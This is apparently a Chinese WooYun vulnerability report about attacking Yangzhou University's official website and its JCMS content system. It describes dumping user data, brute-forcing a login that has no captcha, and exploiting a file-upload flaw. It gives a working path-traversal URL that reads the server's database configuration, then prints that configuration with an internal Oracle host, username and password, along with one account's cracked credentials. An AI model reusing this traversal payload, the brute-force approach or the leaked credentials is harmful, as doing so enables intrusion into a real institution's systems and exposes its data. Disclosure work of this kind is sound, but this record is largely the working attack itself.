WooYun.org

拖下来后，没截图，（实际上拖下来的我早已经删了，反正没什么大用）
不知道密码加密是怎么，base64吗？没解出来。不过，有用户名，那就暴力了
虽然www.yzu.edu.cn/jcms有验证码，但www.yzu.edu.cn/vc没有，可以暴力了。
解出来一个：wewe 密码 123456
根据 WooYun: 大汉通版jcms任意文件上传漏洞 这个漏洞
登上jcms，利用上传xml的漏洞，但jsp文件上传不成功，并且看样子jsp也不能执行
不过传个html的黑页也不错，胆小就不试了。
zone有说过，只能html的话，那也可以跨站，也不试了吧。
jcms的某个洞读取数据库配置
http://www.yzu.edu.cn/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
<something-else-entirely>
<proxool>
<alias>1</alias>
<driver-url>jdbc:oracle:thin:@10.241.0.34:1521:orcyzu</driver-url>
<driver-class>oracle.jdbc.driver.OracleDriver</driver-class>
<driver-properties>
<property name="user" value="jcms"/>
<property name="password" value="jcms_yzu"/>
</driver-properties>
<minimum-connection-count>10</minimum-connection-count>
<maximum-connection-count>30</maximum-connection-count>
<house-keeping-test-sql>select CURRENT_DATE</house-keeping-test-sql>
<dbtype>oracle</dbtype>
</proxool>
</something-else-entirely>
主站呐！官网呐！有注入呐！太丢人了吧！